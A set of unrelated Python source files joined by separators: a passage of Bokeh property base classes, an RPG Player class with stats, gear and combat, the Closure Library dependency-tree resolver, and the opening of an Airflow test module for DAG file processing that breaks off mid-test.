            default = self._copy_default(overrides[name])
        else:
            default = self._raw_default()
        return self.prepare_value(cls, name, default)

    @property
    def serialized(self):
        ''' Whether the property should be serialized when serializing an object.

        This would be False for a "virtual" or "convenience" property that duplicates
        information already available in other properties, for example.

        '''
        return self._serialized

    @property
    def readonly(self):
        ''' Whether this property is read-only.

        Read-only properties may only be modified by the client (i.e., by BokehJS
        in the browser).

        '''
        return self._readonly

    def matches(self, new, old):
        ''' Whether two values compare as equal for this property.

        '''
        # XXX: originally this code warned about not being able to compare values, but that
        # doesn't make sense, because most comparisons involving numpy arrays will fail with
        # ValueError exception, thus warning about inevitable.
        try:
            if new is None or old is None:
                return new is old # XXX: silence FutureWarning from NumPy
            else:
                return new == old
        except (KeyboardInterrupt, SystemExit):
            raise
        except Exception:
            # if we cannot compare (e.g. arrays) just punt return False for match
            pass
        return False

    def from_json(self, json, models=None):
        ''' Convert from JSON-compatible values into a value for this property.

        JSON-compatible values are: list, dict, number, string, bool, None

        '''
        return json

    def serialize_value(self, value):
        ''' Change the value into a JSON serializable format.

        '''
        return value

    def transform(self, value):
        ''' Change the value into the canonical format for this property.

        Args:
            value (obj) : the value to apply transformation to.

        Returns:
            obj: transformed value

        '''
        return value

    def validate(self, value):
        ''' Determine whether we can set this property from this value.

        Validation happens before transform()

        Args:
            value (obj) : the value to validate against this property type

        Returns:
            None

        Raises:
            ValueError if the value is not valid for this property type

        '''
        pass

    def is_valid(self, value):
        ''' Whether the value passes validation

        Args:
            value (obj) : the value to validate against this property type

        Returns:
            True if valid, False otherwise

        '''
        # NOTE: only ValueError is treated as "invalid"; any other exception
        # raised by validate() propagates.
        try:
            self.validate(value)
        except ValueError:
            return False
        else:
            return True

    @classmethod
    def _wrap_container(cls, value):
        # Wrap plain lists/dicts in the property container types; values that
        # are already wrapped are passed through unchanged.
        if isinstance(value, list):
            if isinstance(value, PropertyValueList):
                return value
            else:
                return PropertyValueList(value)
        elif isinstance(value, dict):
            if isinstance(value, PropertyValueDict):
                return value
            else:
                return PropertyValueDict(value)
        else:
            return value

    def prepare_value(self, obj_or_cls, name, value):
        ''' Validate a value, converting it via registered alternatives if
        direct validation fails, then transform it, check assertions (for
        instances only), and wrap containers.

        '''
        try:
            self.validate(value)
        except ValueError as e:
            # Direct validation failed: try each type registered with
            # accepts(), converting on the first one that matches.
            for tp, converter in self.alternatives:
                if tp.is_valid(value):
                    value = converter(value)
                    break
            else:
                raise e
        else:
            # Only values that validated directly are transformed.
            value = self.transform(value)

        # local import, presumably to avoid a circular module dependency — confirm
        from ..has_props import HasProps
        if isinstance(obj_or_cls, HasProps):
            obj = obj_or_cls

            # Assertions registered with asserts() apply to instances only.
            for fn, msg_or_fn in self.assertions:
                if isinstance(fn, bool):
                    result = fn
                else:
                    result = fn(obj, value)

                assert isinstance(result, bool)

                if not result:
                    if isinstance(msg_or_fn, string_types):
                        raise ValueError(msg_or_fn)
                    else:
                        msg_or_fn(obj, name, value)

        return self._wrap_container(value)

    @property
    def has_ref(self):
        # Plain properties hold no references to other models.
        return False

    def accepts(self, tp, converter):
        ''' Declare that other types may be converted to this property type.

        Args:
            tp (Property) :
                A type that may be converted automatically to this property
                type.

            converter (callable) :
                A function accepting ``value`` to perform conversion of the
                value to this property type.

        Returns:
            self

        '''
        tp = ParameterizedProperty._validate_type_param(tp)
        self.alternatives.append((tp, converter))
        return self

    def asserts(self, fn, msg_or_fn):
        ''' Assert that prepared values satisfy given conditions.

        Assertions are intended to enforce conditions beyond simple value
        type validation. For instance, this method can be used to assert that
        the columns of a ``ColumnDataSource`` all collectively have the same
        length at all times.

        Args:
            fn (callable) :
                A function accepting ``(obj, value)`` that returns True if the value
                passes the assertion, or False otherwise

            msg_or_fn (str or callable) :
                A message to print in case the assertion fails, or a function
                accepting ``(obj, name, value)`` to call in in case the assertion
                fails.

        Returns:
            self

        '''
        self.assertions.append((fn, msg_or_fn))
        return self
class ParameterizedProperty(Property):
    ''' A base class for Properties that have type parameters, e.g.
    ``List(String)``.

    '''

    @staticmethod
    def _validate_type_param(type_param):
        ''' Normalize a type parameter to a ``Property`` instance.

        Bare ``Property`` subclasses are instantiated; ``Property``
        instances are returned as-is.

        Raises:
            ValueError: if ``type_param`` is neither a Property subclass
                nor a Property instance.
        '''
        if isinstance(type_param, type):
            if issubclass(type_param, Property):
                return type_param()
            else:
                type_param = type_param.__name__
        elif isinstance(type_param, Property):
            return type_param

        # BUG FIX: message previously read "expected a Propertyas type
        # parameter" (missing space).
        raise ValueError("expected a Property as type parameter, got %s" % type_param)

    @property
    def type_params(self):
        ''' The type parameters of this property (abstract). '''
        raise NotImplementedError("abstract method")

    @property
    def has_ref(self):
        # A parameterized property holds model references if any of its
        # type parameters do.
        return any(type_param.has_ref for type_param in self.type_params)
class PrimitiveProperty(Property):
    ''' A base class for simple property types.

    Subclasses should define a class attribute ``_underlying_type`` that is
    a tuple of acceptable type values for the property.

    Example:

        A trivial version of a ``Float`` property might look like:

        .. code-block:: python

            class Float(PrimitiveProperty):
                _underlying_type = (numbers.Real,)

    '''

    # Tuple of acceptable concrete types; subclasses must override this.
    _underlying_type = None

    def validate(self, value):
        ''' Reject any value that is not None and not an instance of
        ``_underlying_type``.
        '''
        super(PrimitiveProperty, self).validate(value)

        if value is None:
            return
        if isinstance(value, self._underlying_type):
            return

        type_names = nice_join([ typ.__name__ for typ in self._underlying_type ])
        raise ValueError("expected a value of type %s, got %s of type %s" %
                         (type_names, value, type(value).__name__))

    def from_json(self, json, models=None):
        ''' Pass through JSON values of the underlying type (or None);
        anything else is a deserialization error.
        '''
        if json is not None and not isinstance(json, self._underlying_type):
            expected = nice_join([ typ.__name__ for typ in self._underlying_type ])
            raise DeserializationError("%s expected %s, got %s" % (self, expected, json))
        return json

    def _sphinx_type(self):
        return self._sphinx_prop_link()
class ContainerProperty(ParameterizedProperty):
    ''' A base class for Container-like type properties.

    '''

    def _may_have_unstable_default(self):
        # all containers are mutable, so the default can be modified
        return True
| |
"""
player.py
Contains the definition of the Player class.
Written by: Mohsin Rizvi
Last edited: 09/28/17
"""
import ability
import item
import bio
import zone
import random
import damage
# The Player character.
class Player:
    """The player character: stats, gear, inventory, gold, and combat."""

    def __init__(self, myName, myRace, myProf):
        """Construct the Player.

        Args:
            myName: The player's name.
            myRace: The character's race (e.g. "Human", "Dwarf", "Elf").
            myProf: The character's profession ("Warrior", "Mage", "Ranger").
        """
        self.name = myName
        self.race = myRace
        self.prof = myProf
        self.biography = bio.Bio(self.race)
        # Initialize and assign player stats and XP.
        self.assignStats()
        self.xp = 0
        self.lvl = 1
        # Generate a world map.
        self.map = zone.WorldMap()
        # Initialize inventory slots and abilities.
        self.gold = 10
        self.inv = []
        self.abilities = []
        # Initialize gear slots and give player basic gear.
        self.initGear()
        self.assignStarterGear()
        # Initialize combat abilities.
        self.initAbilities()

    def assignStats(self):
        """Assign the player stats based on race and profession."""
        # Start from defaults, then layer on race and profession bonuses.
        self.initStats()
        self.adjustStatsRace()
        self.adjustStatsProf()

    def initStats(self):
        """Initialize all player stats to default values."""
        self.initBasicStats()
        self.initResistStats()
        self.initAttackStats()

    def initBasicStats(self):
        """Assign the player default basic stats."""
        # Health, energy, defense, and base damage.
        self.max_hp = 20
        self.curr_hp = 20
        self.max_energy = 20
        self.curr_energy = 20
        self.defense = 0
        self.damage = 0
        # Strength, wisdom, dexterity, charisma, luck, and perception.
        self.str = 5
        self.wis = 5
        self.dex = 5
        self.cha = 5
        self.lck = 5
        self.per = 5

    def initResistStats(self):
        """Assign the player default damage-resist stats."""
        self.poison_resist = 0
        self.fire_resist = 0
        self.cold_resist = 0
        self.electric_resist = 0
        self.earth_resist = 0

    def initAttackStats(self):
        """Assign the player default elemental attack stats."""
        self.poison_dmg = 0
        self.cold_dmg = 0
        self.fire_dmg = 0
        self.electric_dmg = 0
        self.earth_dmg = 0

    def adjustStatsRace(self):
        """Adjust player stats according to character race."""
        if self.race == "Human":
            self.max_hp += 3
            self.curr_hp += 3
            self.max_energy += 3
            self.curr_energy += 3
            self.str += 1
            self.wis += 1
            self.cha += 1
            self.fire_resist += 1
        elif self.race == "Dwarf":
            self.max_hp += 6
            self.curr_hp += 6
            self.str += 1
            self.dex += 1
            self.lck += 1
            self.electric_resist += 1
        elif self.race == "Elf":
            self.max_energy += 6
            self.curr_energy += 6
            self.dex += 1
            self.wis += 1
            self.per += 1
            self.poison_resist += 1

    def adjustStatsProf(self):
        """Adjust player stats according to character profession."""
        # Each profession trades one resistance for another plus two stat
        # points.
        if self.prof == "Warrior":
            self.str += 1
            self.lck += 1
            self.earth_resist += 1
            self.electric_resist -= 1
        elif self.prof == "Mage":
            self.wis += 1
            self.cha += 1
            self.fire_resist += 1
            self.earth_resist -= 1
        elif self.prof == "Ranger":
            self.dex += 1
            self.per += 1
            self.poison_resist += 1
            self.cold_resist -= 1

    def initGear(self):
        """Initialize player gear slots (empty)."""
        self.armor = None
        self.weapon = None
        self.ring = None

    def assignStarterGear(self):
        """Give the player default starter gear according to profession."""
        # BUG FIX: removed a stray "pass" that preceded these statements.
        self.addItem("Apple", 3)
        self.calcDamage()

    def equipArmor(self, index):
        """Equip the piece of armor at the given inventory index.

        Args:
            index: Index of the armor in self.inv.
        """
        # BUG FIX: was "inv[index]" (a NameError) -- the inventory is an
        # attribute and must be accessed through self.
        candidate = self.inv[index]
        if candidate.type != "Armor" or candidate.prof != self.prof:
            print("You can't wear that!")
            return
        # Equip the armor.
        self.armor = self.inv.pop(index)
        # Give the player the armor stats.
        self.defense += self.armor.defense
        self.poison_resist += self.armor.poison_resist
        self.fire_resist += self.armor.fire_resist
        self.cold_resist += self.armor.cold_resist
        self.electric_resist += self.armor.electric_resist
        self.earth_resist += self.armor.earth_resist

    def unequipArmor(self):
        """Unequip the currently worn armor, returning it to the inventory."""
        if self.armor is None:
            print("You have no armor to unequip!")
            return
        # Remove the armor's stat bonuses.
        self.defense -= self.armor.defense
        self.poison_resist -= self.armor.poison_resist
        self.fire_resist -= self.armor.fire_resist
        self.cold_resist -= self.armor.cold_resist
        self.electric_resist -= self.armor.electric_resist
        self.earth_resist -= self.armor.earth_resist
        # Finish taking the armor off.
        self.inv.append(self.armor)
        self.armor = None

    def equipWeapon(self, index):
        """Equip the weapon at the given inventory index.

        Args:
            index: Index of the weapon in self.inv.
        """
        # BUG FIX: was "inv[index]" (a NameError).
        candidate = self.inv[index]
        if candidate.type != "Weapon" or candidate.prof != self.prof:
            print("That's not a weapon!")
            return
        # Equip the weapon.
        self.weapon = self.inv.pop(index)
        # Give the player the weapon stats.
        self.poison_dmg += self.weapon.poison_dmg
        self.fire_dmg += self.weapon.fire_dmg
        self.cold_dmg += self.weapon.cold_dmg
        self.electric_dmg += self.weapon.electric_dmg
        self.earth_dmg += self.weapon.earth_dmg
        self.defense += self.weapon.defense
        self.poison_resist += self.weapon.poison_resist
        self.fire_resist += self.weapon.fire_resist
        self.cold_resist += self.weapon.cold_resist
        self.electric_resist += self.weapon.electric_resist
        self.earth_resist += self.weapon.earth_resist
        self.calcDamage()

    def unequipWeapon(self):
        """Unequip the current weapon, returning it to the inventory."""
        if self.weapon is None:
            print("You have no weapon to unequip!")
            return
        # Remove the weapon's stat bonuses.
        self.poison_dmg -= self.weapon.poison_dmg
        self.fire_dmg -= self.weapon.fire_dmg
        self.cold_dmg -= self.weapon.cold_dmg
        self.electric_dmg -= self.weapon.electric_dmg
        self.earth_dmg -= self.weapon.earth_dmg
        self.defense -= self.weapon.defense
        self.poison_resist -= self.weapon.poison_resist
        self.fire_resist -= self.weapon.fire_resist
        self.cold_resist -= self.weapon.cold_resist
        self.electric_resist -= self.weapon.electric_resist
        self.earth_resist -= self.weapon.earth_resist
        # Take the weapon off and recalculate damage.
        self.inv.append(self.weapon)
        self.weapon = None
        self.calcDamage()

    def equipRing(self, index):
        """Equip the ring at the given inventory index.

        Args:
            index: Index of the ring in self.inv.
        """
        # BUG FIX: was "inv[index]" (a NameError).
        if self.inv[index].type != "Ring":
            print("That's not a ring!")
            return
        # Equip the ring.
        self.ring = self.inv.pop(index)
        # Give the player ring stats.
        self.str += self.ring.str
        self.wis += self.ring.wis
        self.dex += self.ring.dex
        self.cha += self.ring.cha
        self.lck += self.ring.lck
        self.per += self.ring.per
        # Recalculate damage.
        self.calcDamage()

    def unequipRing(self):
        """Unequip the current ring, returning it to the inventory."""
        if self.ring is None:
            print("You have no ring to unequip!")
            return
        # Remove the ring's stat bonuses.
        self.str -= self.ring.str
        self.wis -= self.ring.wis
        self.dex -= self.ring.dex
        self.cha -= self.ring.cha
        self.lck -= self.ring.lck
        self.per -= self.ring.per
        # Take the ring off and recalculate damage.
        self.inv.append(self.ring)
        self.ring = None
        self.calcDamage()

    def calcDamage(self):
        """Recalculate self.damage (physical only, no elemental damage)."""
        # Unarmed damage scales off strength alone.
        if self.weapon is None:
            self.damage = self.str / 2
            return
        # Weapon damage plus twice the profession's key stat.
        self.damage = self.weapon.damage
        if self.prof == "Warrior":
            self.damage += (self.str * 2)
        elif self.prof == "Mage":
            self.damage += (self.wis * 2)
        elif self.prof == "Ranger":
            self.damage += (self.dex * 2)

    def takeDamage(self, damage_received, mult_modifier=0.075):
        """Take the given Damage.

        Args:
            damage_received: A Damage instance describing the attack.
            mult_modifier: Scale factor for the defense-based random
                modifier. BUG FIX: the original body used this name but it
                was missing from the signature (NameError); the original
                docstring already documented the .075 default.

        Returns:
            The amount of damage dealt (0 if the attack misses).
        """
        # Check if the attack misses.
        miss_chance = int(self.lck + (self.dex * 0.5))
        miss = random.randrange(0, 101)
        if miss <= miss_chance:
            return 0
        # Calculate whether or not the modifier is negative.
        negative = random.randrange(0, 2)
        # BUG FIX: random.randrange() rejects non-integer bounds; use
        # random.uniform for the fractional defense-based modifier.
        modifier = random.uniform(0, self.defense * mult_modifier)
        if negative != 0:
            modifier *= -1
        # Apply the resistance matching the attack's element (mutates the
        # incoming Damage, as the original did; unknown elements subtract 0).
        resist = {
            "Electric": self.electric_resist,
            "Fire": self.fire_resist,
            "Cold": self.cold_resist,
            "Earth": self.earth_resist,
            "Poison": self.poison_resist,
        }.get(damage_received.ele_type, 0)
        damage_received.ele_dmg -= resist
        # BUG FIX: the random modifier is additive (mirroring doDamage),
        # not a multiplier on the whole total.
        total_dmg = ((damage_received.reg_damage - self.defense) +
                     damage_received.ele_dmg) + modifier
        self.curr_hp -= total_dmg
        if self.curr_hp <= 0:
            # BUG FIX: was a bare die() call (NameError).
            self.die()
        return total_dmg

    def die(self):
        """'Kill' the player upon death (not yet implemented)."""
        pass

    def doDamage(self, ele_type, mult_modifier = 0.2):
        """Get damage done for an attack, stored in a Damage instance.

        Args:
            ele_type: Elemental damage type string (e.g. "Fire").
            mult_modifier: Scale factor for the random damage modifier.

        Returns:
            A Damage instance to pass to the target, or None for an
            unrecognized element (preserving the original behavior).
        """
        # Calculate whether or not the modifier will be negative.
        negative = random.randrange(0, 2)
        # BUG FIX: random.randrange() rejects non-integer bounds; use
        # random.uniform for the fractional damage modifier.
        modifier = random.uniform(0, self.damage * mult_modifier)
        if negative != 0:
            modifier *= -1
        damage_dealt = self.damage + modifier
        # Pair the attack with the matching elemental damage stat.
        ele_dmg = {
            "Electric": self.electric_dmg,
            "Fire": self.fire_dmg,
            "Cold": self.cold_dmg,
            "Earth": self.earth_dmg,
            "Poison": self.poison_dmg,
        }.get(ele_type)
        if ele_dmg is None:
            return None
        return damage.Damage(damage_dealt, ele_dmg, ele_type)

    def initAbilities(self):
        """Initialize player's abilities according to class (not yet
        implemented). Abilities are "given" to the player at start and
        unlocked over time."""
        pass

    def addItem(self, itemName, amt = 1):
        """Give the player a certain amount of the named item.

        Args:
            itemName: String name of the item to give.
            amt: Number of copies to give (default 1).
        """
        for _ in range(amt):
            self.inv.append(item.Item(itemName))

    def hasItem(self, item):
        """Return True if the inventory contains an item named *item*."""
        # BUG FIX: iterate the items themselves; the old code indexed
        # self.inv with an Item object (TypeError).
        for owned in self.inv:
            if owned.name == item:
                return True
        return False

    def takeItem(self, item):
        """Remove the first inventory item with the given name, if any."""
        # BUG FIX: hasItem must be called through self, and removal must
        # pop by index rather than indexing the list with an Item object.
        if not self.hasItem(item):
            print("Sorry, you don't have that item.")
            return
        for i, owned in enumerate(self.inv):
            if owned.name == item:
                self.inv.pop(i)
                return

    def addGold(self, amtGold):
        """Give the player the given amount of gold."""
        self.gold += amtGold

    def hasGold(self, amtGold):
        """Return True if the player has at least *amtGold* gold."""
        return self.gold >= amtGold

    def takeGold(self, amtGold):
        """Remove the given amount of gold from the player, if affordable."""
        if self.hasGold(amtGold):
            self.gold -= amtGold
        else:
            print("Sorry, you don't have enough gold")

    def setZone(self, zone_x, zone_y):
        """Set the player's current zone.

        Args:
            zone_x: X coordinate of the zone on the world map.
            zone_y: Y coordinate of the zone on the world map.
        """
        self.x_coord = zone_x
        self.y_coord = zone_y
        # BUG FIX: was bare x_coord/y_coord (NameError); use the attributes.
        self.loc = self.map.zones[self.x_coord][self.y_coord]

    def moveNorth(self):
        """Move the player north (not yet implemented)."""
        pass

    def moveEast(self):
        """Move the player east (not yet implemented)."""
        pass

    def moveSouth(self):
        """Move the player south (not yet implemented)."""
        pass

    def moveWest(self):
        """Move the player west (not yet implemented)."""
        pass
| |
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to represent a full Closure Library dependency tree.
Offers a queryable tree of dependencies of a given set of sources. The tree
will also do logical validation to prevent duplicate provides and circular
dependencies.
"""
__author__ = 'nnaze@google.com (Nathan Naze)'
import re
_REQUIRES_ALL_REGEX = re.compile('(.+)\.\*')
class DepsTree(object):
  """Represents the set of dependencies between source files."""

  def __init__(self, sources):
    """Initializes the tree with a set of sources.

    Args:
      sources: A set of JavaScript sources.

    Raises:
      MultipleProvideError: A namespace is provided by multiple sources.
      NamespaceNotFoundError: A namespace is required but never provided.
    """
    self._sources = sources
    # Flat map: full namespace string -> source that provides it.
    self._provides_map = dict()
    # Nested map: namespace segment -> subtree dict; a node's providing
    # source is stored under its "__source__" key (see addProvide).
    self._provides_map_tree = dict()

    # Ensure nothing was provided twice.
    for source in sources:
      for provide in source.provides:
        if provide in self._provides_map:
          raise MultipleProvideError(
              provide, [self._provides_map[provide], source])

        self._provides_map[provide] = source
        DepsTree.addProvide(self._provides_map_tree, provide, source)

    # Check that all required namespaces are provided. Wildcard requires
    # ("foo.*") are exempt here; they are resolved against the tree later.
    for source in sources:
      for require in source.requires:
        require_all = _REQUIRES_ALL_REGEX.match(require)
        if not require_all and require not in self._provides_map:
          raise NamespaceNotFoundError(require, source)

  @staticmethod
  def getRequire(provide_map, require):
    """Finds the source(s) providing a (possibly wildcard) namespace.

    Args:
      provide_map: Nested provides map (see __init__).
      require: Dotted namespace; a leading "*" segment collects every
        source in the current subtree.

    Returns:
      A list of source objects providing the namespace.
    """
    names=require.split(".", 1)
    if names[0] == "*":
      # Wildcard: gather every source anywhere below this node.
      sources = []
      for key in provide_map:
        obj = provide_map[key]
        if type(obj) is dict:
          sources = sources + DepsTree.getRequire(obj, "*")
        else:
          sources.append(obj)
      return sources
    # NOTE(review): raises KeyError (not NamespaceNotFoundError) when the
    # first segment is absent from provide_map — confirm this is intended.
    current=provide_map[names[0]]
    if names[0] == require:
      # No remaining dotted path: return this node's own provider.
      return [current["__source__"]]
    elif type(current) is dict:
      # Descend into the subtree with the remainder of the path.
      return DepsTree.getRequire(current, names[1])
    else:
      return []

  @staticmethod
  def addProvide(map, provide, source):
    """Inserts a provided namespace into the nested provides tree.

    Splits the dotted namespace one segment at a time, creating subtree
    dicts as needed, and records *source* under the "__source__" key of
    the final segment's node.
    """
    names=provide.split(".", 1)
    if not names[0] in map:
      map[names[0]] = dict()
    if names[0] == provide:
      # Full namespace consumed: attach the providing source here.
      map[provide]["__source__"] = source
    else:
      # Recurse with the remainder of the dotted path.
      DepsTree.addProvide(map[names[0]], names[1], source)

  def GetDependencies(self, required_namespaces):
    """Get source dependencies, in order, for the given namespaces.

    Args:
      required_namespaces: A string (for one) or list (for one or more) of
        namespaces.

    Returns:
      A list of source objects that provide those namespaces and all
      requirements, in dependency order (duplicates removed, first
      occurrence kept).

    Raises:
      NamespaceNotFoundError: A namespace is requested but doesn't exist.
      CircularDependencyError: A cycle is detected in the dependency tree.
    """
    if isinstance(required_namespaces, str):
      required_namespaces = [required_namespaces]

    deps_sources = []
    for namespace in required_namespaces:
      for source in DepsTree._ResolveDependencies(
          namespace, [], self._provides_map, self._provides_map_tree, []):
        if source not in deps_sources:
          deps_sources.append(source)

    return deps_sources

  @staticmethod
  def _ResolveDependencies(required_namespace, deps_list, provides_map, provides_map_tree,
                           traversal_path):
    """Resolve dependencies for Closure source files.

    Follows the dependency tree down and builds a list of sources in dependency
    order. This function will recursively call itself to fill all dependencies
    below the requested namespaces, and then append its sources at the end of
    the list.

    Args:
      required_namespace: String of required namespace.
      deps_list: List of sources in dependency order. This function will append
        the required source once all of its dependencies are satisfied.
      provides_map: Map from namespace to source that provides it.
      provides_map_tree: Nested provides map (namespace segment -> subtree)
        used to resolve wildcard ("foo.*") requires via getRequire.
      traversal_path: List of namespaces of our path from the root down the
        dependency/recursion tree. Used to identify cyclical dependencies.
        This is a list used as a stack -- when the function is entered, the
        current namespace is pushed and popped right before returning.
        Each recursive call will check that the current namespace does not
        appear in the list, throwing a CircularDependencyError if it does.

    Returns:
      The given deps_list object filled with sources in dependency order.

    Raises:
      NamespaceNotFoundError: A namespace is requested but doesn't exist.
      CircularDependencyError: A cycle is detected in the dependency tree.
    """
    sources = DepsTree.getRequire(provides_map_tree, required_namespace)
    for source in sources:
      if not source:
        raise NamespaceNotFoundError(required_namespace)

      if required_namespace in traversal_path:
        traversal_path.append(required_namespace)  # do this *after* the test

        # This must be a cycle.
        raise CircularDependencyError(traversal_path)

      # If we don't have the source yet, we'll have to visit this namespace and
      # add the required dependencies to deps_list.
      if source not in deps_list:
        traversal_path.append(required_namespace)

        for require in source.requires:
          # Append all other dependencies before we append our own.
          DepsTree._ResolveDependencies(require, deps_list, provides_map, provides_map_tree,
                                        traversal_path)
        deps_list.append(source)

        traversal_path.pop()

    return deps_list
class BaseDepsTreeError(Exception):
  """Common base class for every error raised by the DepsTree machinery."""

  def __init__(self):
    super(BaseDepsTreeError, self).__init__()
class CircularDependencyError(BaseDepsTreeError):
  """Raised when a dependency cycle is encountered."""

  def __init__(self, dependency_list):
    super(CircularDependencyError, self).__init__()
    self._dependency_list = dependency_list

  def __str__(self):
    # One namespace per line, in traversal order, so the cycle is readable.
    cycle = '\n'.join(self._dependency_list)
    return 'Encountered circular dependency:\n%s\n' % cycle
class MultipleProvideError(BaseDepsTreeError):
  """Raised when a namespace is provided more than once."""

  def __init__(self, namespace, sources):
    super(MultipleProvideError, self).__init__()
    self._namespace = namespace
    self._sources = sources

  def __str__(self):
    source_strs = [str(source) for source in self._sources]
    return ('Namespace "%s" provided more than once in sources:\n%s\n' %
            (self._namespace, '\n'.join(source_strs)))
class NamespaceNotFoundError(BaseDepsTreeError):
  """Raised when a namespace is requested but not provided."""

  def __init__(self, namespace, source=None):
    super(NamespaceNotFoundError, self).__init__()
    self._namespace = namespace
    self._source = source

  def __str__(self):
    message = 'Namespace "%s" never provided.' % self._namespace
    if self._source:
      # Mention the requiring source when we know it.
      message += ' Required in %s' % self._source
    return message
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pathlib
import sys
import tempfile
import unittest
from datetime import datetime, timedelta
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
from airflow.configuration import conf
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.jobs.scheduler_job import DagFileProcessorProcess
from airflow.models import DagBag, TaskInstance as TI
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.dag_processing import DagFileProcessorAgent, DagFileProcessorManager, DagFileStat
from airflow.utils.file import correct_maybe_zipped
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_runs
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'dags')
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
SETTINGS_FILE_VALID = """
LOGGING_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'airflow.task': {
'format': '[%(asctime)s] {%(process)d %(filename)s:%(lineno)d} %(levelname)s - %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'airflow.task',
'stream': 'ext://sys.stdout'
},
'task': {
'class': 'logging.StreamHandler',
'formatter': 'airflow.task',
'stream': 'ext://sys.stdout'
},
},
'loggers': {
'airflow': {
'handlers': ['console'],
'level': 'INFO',
'propagate': False
},
'airflow.task': {
'handlers': ['task'],
'level': 'INFO',
'propagate': False,
},
}
}
"""
SETTINGS_DEFAULT_NAME = 'custom_airflow_local_settings'
class settings_context:  # pylint: disable=invalid-name
    """
    Context manager that writes a settings module to a temp directory,
    puts it on sys.path, and registers it as the logging config class.

    :param content: source text of the generated settings file
    :param directory: optional slash-separated sub-package to nest it in
    :param name: attribute inside the module holding the logging config
    """

    def __init__(self, content, directory=None, name='LOGGING_CONFIG'):
        self.content = content
        self.settings_root = tempfile.mkdtemp()
        filename = "{}.py".format(SETTINGS_DEFAULT_NAME)
        if directory:
            # The dotted module path mirrors the on-disk package layout.
            self.module = '.'.join(
                [directory.replace('/', '.'), SETTINGS_DEFAULT_NAME, name])
            dir_path = os.path.join(self.settings_root, directory)
            pathlib.Path(dir_path).mkdir(parents=True, exist_ok=True)
            # Drop an __init__.py at every level so the whole chain is a
            # proper importable package.
            basedir = self.settings_root
            for part in directory.split('/'):
                open(os.path.join(basedir, '__init__.py'), 'w').close()
                basedir = os.path.join(basedir, part)
            open(os.path.join(basedir, '__init__.py'), 'w').close()
            self.settings_file = os.path.join(dir_path, filename)
        else:
            self.module = '.'.join([SETTINGS_DEFAULT_NAME, name])
            self.settings_file = os.path.join(self.settings_root, filename)

    def __enter__(self):
        with open(self.settings_file, 'w') as handle:
            handle.writelines(self.content)
        sys.path.append(self.settings_root)
        conf.set('logging', 'logging_config_class', self.module)
        return self.settings_file

    def __exit__(self, *exc_info):
        # The temp tree is deliberately left on disk; only the config and
        # sys.path changes are rolled back.
        conf.set('logging', 'logging_config_class', '')
        sys.path.remove(self.settings_root)
class TestDagFileProcessorManager(unittest.TestCase):
    """Tests for DagFileProcessorManager: processor bookkeeping when the
    tracked file list changes, zombie task detection, and killing of
    timed-out per-file processors."""
    def setUp(self):
        # Tests below create TaskInstances/LocalTaskJobs; start clean.
        clear_db_runs()
    def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
        """A processor whose file vanished from the path list is dropped."""
        manager = DagFileProcessorManager(
            dag_directory='directory',
            file_paths=['abc.txt'],
            max_runs=1,
            processor_factory=MagicMock().return_value,
            processor_timeout=timedelta.max,
            signal_conn=MagicMock(),
            async_mode=True)
        mock_processor = MagicMock()
        # stop() raising mimics an already-gone processor; terminate() is
        # the call the manager is expected to fall back to.
        mock_processor.stop.side_effect = AttributeError(
            'DagFileProcessor object has no attribute stop')
        mock_processor.terminate.side_effect = None
        manager._processors['missing_file.txt'] = mock_processor
        manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
        manager.set_file_paths(['abc.txt'])
        self.assertDictEqual(manager._processors, {})
    def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
        """A processor whose file is still tracked must be kept as-is."""
        manager = DagFileProcessorManager(
            dag_directory='directory',
            file_paths=['abc.txt'],
            max_runs=1,
            processor_factory=MagicMock().return_value,
            processor_timeout=timedelta.max,
            signal_conn=MagicMock(),
            async_mode=True)
        mock_processor = MagicMock()
        mock_processor.stop.side_effect = AttributeError(
            'DagFileProcessor object has no attribute stop')
        mock_processor.terminate.side_effect = None
        manager._processors['abc.txt'] = mock_processor
        manager.set_file_paths(['abc.txt'])
        self.assertDictEqual(manager._processors, {'abc.txt': mock_processor})
    def test_find_zombies(self):
        """A RUNNING TI whose LocalTaskJob is SHUTDOWN is reported as a
        zombie (as a SimpleTaskInstance) after the query interval elapsed."""
        manager = DagFileProcessorManager(
            dag_directory='directory',
            file_paths=['abc.txt'],
            max_runs=1,
            processor_factory=MagicMock().return_value,
            processor_timeout=timedelta.max,
            signal_conn=MagicMock(),
            async_mode=True)
        dagbag = DagBag(TEST_DAG_FOLDER)
        with create_session() as session:
            session.query(LJ).delete()
            dag = dagbag.get_dag('example_branch_operator')
            task = dag.get_task(task_id='run_this_first')
            # RUNNING TI attached to a SHUTDOWN job == zombie condition.
            ti = TI(task, DEFAULT_DATE, State.RUNNING)
            local_job = LJ(ti)
            local_job.state = State.SHUTDOWN
            local_job.id = 1
            ti.job_id = local_job.id
